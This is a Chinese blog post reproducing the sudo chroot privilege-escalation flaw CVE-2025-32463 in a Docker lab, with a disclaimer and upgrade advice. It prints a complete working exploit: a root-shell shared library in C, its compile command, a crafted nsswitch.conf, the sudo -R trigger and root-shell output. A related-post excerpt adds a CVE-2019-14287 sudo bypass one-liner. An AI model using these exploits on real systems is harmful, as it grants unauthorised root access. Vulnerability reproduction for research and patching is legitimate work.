Linux sudo chroot本地提权漏洞(CVE-2025-32463)复现

已于 2025-07-14 11:23:33 修改
阅读量315 收藏 4
点赞数 5
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 Linux 文章标签: linux sudo CVE 安全
于 2025-07-14 11:22:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Dalock/article/details/149326286

免责声明

本文所述漏洞复现方法仅供安全研究及授权测试使用;

任何个人/组织须在合法合规前提下实施,严禁用于非法目的;

作者不对任何滥用行为及后果负责,如发现新漏洞请及时联系厂商并遵循漏洞披露规则。

漏洞原理

Linux sudo chroot 是 Linux 系统中用于更改进程根目录的命令,通过指定新根目录来限制用户访问权限,常用于安全隔离、系统恢复和软件测试等场景

Linux sudo chroot 权限提升漏洞(CVE-2025-32463)源于本地低权限用户通过特制的恶意chroot 环境触发动态库加载,从而以root 权限执行任意代码

sudo的-R( --chroot) 选项旨在允许用户在 sudoers 文件允许的情况下,使用用户选择的根目录运行命令

sudo 1.9.14 版本进行了一项更改,它在读取 sudoers 配置文件之前,就开始在 chroot 环境中解析路径,攻击者可以通过在用户指定的根目录下创建/etc/nsswitch.conf文件,诱骗 sudo加载任意共享库

影响版本

1.9.14 <= sudo <= 1.9.17

注意:Sudo 的旧版本(当前<= 1.8.32)不易受到攻击,因为不存在chroot功能

PoC

执行:

pwn ~ $ sudo -R woot woot

如果存在漏洞将返回:

sudo: woot: No such file or directory

如果为漏洞已修复版本将返回:

[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot

漏洞复现

1. 环境搭建

  1. git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
  2. cd CVE-2025-32463_chwoot
  3. 执行./run.sh构建并运行Docker镜像

2. 漏洞复现

2.1. 不直接使用EXP
2.1.1. 创建恶意共享库

没有vi等编辑器可以直接用cat写入文件

cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0); // root uid
  setregid(0,0); // root gid
  chdir("/");
  execl("/bin/sh", "sh", "-c", "/bin/bash", NULL);
}
EOF

编译为共享库

gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
2.1.2. 配置nsswitch.conf
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
2.1.3. Exploit
sudo -R woot woot
  1. 切换根目录至woot
  2. 加载libnss_/woot1337.so.2
  3. 恶意库执行命令,获得root shell

2.2. 直接利用EXP

EXP已经披露,就放置在当前home目录下,可以直接执行

  • 以root权限执行命令  ./sudo-chwoot.sh id
pwn@5e57d3e9f134:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
  • 进入root shell  ./sudo-chwoot.sh
pwn@5e57d3e9f134:~$ ./sudo-chwoot.sh
woot!
root@5e57d3e9f134:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@5e57d3e9f134:/#

防御措施

升级到漏洞修复版本

CVE-2025-32463Linux
墨痕诉清风的博客
07-14 50
漏洞前置介绍1:sudolinux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具漏洞前置介绍2:chrootLinux 系统中用于更改进程根目录的命令,通过指定新根目录来限制用户访问限,常用于安全隔离、系统恢复和软件测试等场景。漏洞简介:Sudo 1.9.14+ 版本存在漏洞:它在切换环境(chroot)后过早解析路径,导致攻击者能通过伪造/etc/nsswitch.conf等文件,诱骗Sudo加载恶意库(如libnss_xxx.so)。
漏洞复现】Docker runC 容器逃逸漏洞(CVE-2019-5736)
李火火的安全圈
12-09 5815
2019年2月11日,runC的维护团队报告了一个新发现的漏洞,SUSE Linux GmbH高级软件工程师Aleksa Sarai公布了影响Docker, containerd, Podman, CRI-O等默认运行时容器runc的严重漏洞CVE-2019-5736。漏洞会对IT运行环境带来威胁,漏洞利用会触发容器逃逸、影响整个容器主机的安全,最终导致运行在该主机上的其他容器被入侵。漏洞影响AWS, Google Cloud等主流云平台。日前,该容器逃逸漏洞的PoC利用代码已在GitHub上公布。
CVE-2025-32463-Linux sudo本地漏洞
selecthch的博客
07-02 448
CVE-2025-32463 Linux sudo 本地漏洞存在于 sudochroot 功能中,当加载目标位置的 nsswitch.conf 配置文件时,会同时加载对应的动态库,攻击者可通过植入恶意动态库使非 sudoer 组用户获取 root 限。近日,Linux sudo 工具公开存在两个紧密关联的本地漏洞CVE-2025-32462 / CVE-2025-32463)。主流 Linux 发行版默认配置下,攻击者可利用这两个漏洞从普通用户升至 root 限。
【高危漏洞CVE-2025-32463Sudo chroot 本地漏洞的技术细节深度剖析
athink_cn的博客
07-01 969
最新高危漏洞Sudo中的一个高危本地漏洞CVE-2025-32463),该漏洞存在于Sudochroot功能中,可允许任何本地限用户在无需配置Sudo规则的情况下,将升至root。
关于Linux sudo 本地漏洞(CVE-2025-32462、CVE-2025-32463)漏洞的修复方案
weixin_48864281的博客
07-02 1501
CVE-2025-32462 Linux sudo 本地漏洞在于 sudo-h(--host)选项存在缺陷,该选项本应与 -l(--list)配合使用来查询远程主机限,但实际未严格限制其仅用于查询功能,导致攻击者可能结合命令执行或文件编辑操作实现本地。近日,Linux sudo 工具公开存在两个紧密关联的本地漏洞CVE-2025-32462 / CVE-2025-32463)。Linux sudo 本地漏洞CVE-2025-32462、CVE-2025-32463
CVE-2025-32463深度解析——低用户极易、快速
Lucky小小吴的小屋
07-05 559
CVE-2025-32463sudo 1.9.14+ 版本存在漏洞:它在切换环境(chroot)后过早解析路径,导致攻击者能通过伪造/etc/nsswitch.conf等文件,诱骗Sudo加载恶意库(如libnss_xxx.so)。无需特殊限即可获得root
不容小觑的威胁:CVE-2025-32463 Linux漏洞,轻松利用却要紧急修复
didiplus
07-06 317
Linux系统发现高危漏洞CVE-2025-32463,影响sudo 1.9.14至1.9.17版本,攻击者可利用chroot功能缺陷通过特定环境变量获取root限。漏洞复现方法已公开,可通过简单命令检测系统是否受影响。建议用户立即升级至sudo 1.9.17p1或更高版本,各主流发行版均已安全补丁。文章还供了Docker环境下的测试方法及修复命令,并推荐了相关安全加固内容。
sudo本地漏洞CVE-2025-3243)
ubaichu的博客
07-03 273
Sudo 从 ​​1.9.14 版本​​开始修改了 chroot 功能的实现逻辑:在解析 sudoers 规则​​之前​​,先通过 pivot_root() 和 unpivot_root() 函数临时切换根目录至用户指定的路径(如 sudo -R /web)​​执行上下文​​:Sudo 进程本身以 ​​root 限​​运行,因此恶意代码直接获得 root 限,​​绕过 sudoers 规则验证​​。​​__attribute__((constructor))​​:确保库被加载时自动执行代码。
紧急预警!Linux Sudo 曝高危漏洞,数亿服务器面临 “一键” 风险
easylife206的专栏
07-02 1519
Stratascale网络研究部门(CRU)发布的最新安全公告显示,Sudo中存在CVE-2025-32463CVE-2025-32462。CRU表示:"该漏洞使sudoers规则中的主机名部分失效,因为用户可以在评估规则时自行设置要使用的主机"。stratascale在公告中表示:"攻击者可利用sudo-R(--chroot)选项以root身份执行任意命令,即使这些命令未列在。这些潜伏在全球最受信任的命令工具中的缺陷,能让攻击者绕过配置保护措施,即使被明确拒绝访问也能将升至root。
SUDO(CVE-2021-3156复现&rsync未授访问
m0_62207170的博客
03-06 883
SUDO(CVE-2021-3156复现&rsync未授访问
华为路由器远程命令执行漏洞复现(CVE-2017-17215)
Zeker62的博客
12-23 7633
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值。 CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞,可以执行任意的命令 远程命令执行漏洞,没有对代码中可执行的特殊函数入口做过滤,导致客户端可以交恶意构造的语句交,让服务器端执行。例如web服务器中的system、eval、exec等函数,在上面的CVE-2020-3452也算是远程命令执行漏洞的一种。 漏洞复现 环境搭建 我使用的是Windows商店下载
华为家用路由器CVE漏洞复现CVE-2017-17215)
weixin_45904478的博客
01-20 1135
因工作原因,需要复现一下华为家用路由器HG532的远程RCE漏洞,但是参考网上教程操作时踩了一些坑,所以记录一下复现成功的全部过程。
cve-2018-5767路由器栈溢出漏洞调试
weixin_54452942的博客
03-19 865
声明:本文参考cve-2018-5767 路由器栈溢出漏洞复现-CSDN博客环境:ubuntu22.04、winne+ida_pro_7.0+pwndbg+python2工作目录如下:固件地址:https://drivers.softpedia.com/get/Router-Switch-Access-Point/Tenda/Tenda-AC15-Router-Firmware-1503116.shtml#downloadfile ./bin/busybox :32位小端ARM找到qemu-arm-stat
Linux庖丁解牛】— 保存信号!
2301_80221228的博客
07-15 1015
信号处理机制解析:信号递达(Delivery)是实际执行信号处理动作的过程,信号未决(Pending)表示信号从产生到递达之间的状态。进程可通过阻塞(Block)信号来阻止其递达,被阻塞的信号会保持未决状态。内核通过三张表管理信号:pending表记录接收的信号,block表标识被阻塞的信号,handler表存储信号处理函数指针。信号集(sigset_t)及相关函数(sigemptyset、sigaddset等)用于操作信号状态。值得注意的是,9号信号(SIGKILL)既不能被捕捉也不能被屏蔽。此外,进程退
Linux 系统进阶操作实践:目录管理与系统信息查看指南
racwwt的博客
07-15 890
本文详细记录了Linux系统中通过Xshell远程管理的核心操作,包括系统信息查询、复杂目录结构创建与树形展示、多级目录快速生成、文件创建与删除、大文件制作等实践步骤。通过命令示例与输出解析,清晰呈现每一步操作的逻辑与效果,帮助读者掌握目录管理、系统信息查看及文件操作的实用技巧,适合Linux实操学习者参考。
Linux】基本指令学习1
最新发布
2401_86785052的博客
07-16 1091
本期博客让我们一起了解Linux的基本指令
[Linux]换行和回车、刷新缓冲区
jk23728的博客
07-16 205
所以在有 \n 的情况下,输出缓冲区在 printf 执行后立刻被刷新,打印出 hhabchhabc;而没有 \n 的情况下,程序结束时输出缓冲区才被刷新,所以会停止 2 秒之后再打印出 hhabchhabc。程序中的指令 printf 交给 CPU 执行,CPU 不能直接向显示器写入,所以需要在内存中开辟一块空间,用于 CPU 暂时写入,这块内存空间就是输出缓冲区,输出缓冲区中的内容会以刷新的形式显示到显示器上。这是因为命令行也有输出,由于回车符,命令行的输出把 hhabchhabc 覆盖了。
C++-linux 7.文件IO(二)文件描述符、阻塞与非阻塞
weixin_59409001的博客
07-14 703
在前文我们介绍了文件 IO 的核心系统调用,本章将深入探讨 Linux 文件 IO 的底层机制,包括文件描述符的本质、阻塞与非阻塞 IO 模型、文件偏移量控制(lseek)以及系统调用中的参数传递规则,帮助你构建更完整的系统编程知识体系。
Linux 基础
qq_68630091的博客
07-16 1062
Windows属于微软一家公司,个人使用较多LinuxRedHat、CentOS、Ubuntu、Rocky Linux、麒麟、openEuler…企业中做服务器使用UnixMacOS [类Unix]
linux sudo漏洞,linux CVE-2019-14287 Sudo漏洞(示例代码)
05-19
CVE-2019-14287是一个sudo漏洞,攻击者可以利用此漏洞绕过sudo的限制,以root用户的身份执行命令。这个漏洞影响sudo 1.8.28版本之前的所有版本。下面是一个示例代码: ``` $ sudo -u#-1 id uid=0(root) gid=0(root) groups=0(root) ``` 这个命令的意思是以id为用户名,并以-1为用户ID,执行sudo的命令。这样一来,sudo会将命令以root用户的身份执行。攻击者可以利用这个漏洞来获取root限,并执行其他恶意操作。 解决这个漏洞的方法是升级sudo到最新版本,并禁用旧版本的sudo。同时,管理员应该对系统进行定期的安全审计,并确保所有软件和系统组件都是最新的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Neolock

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值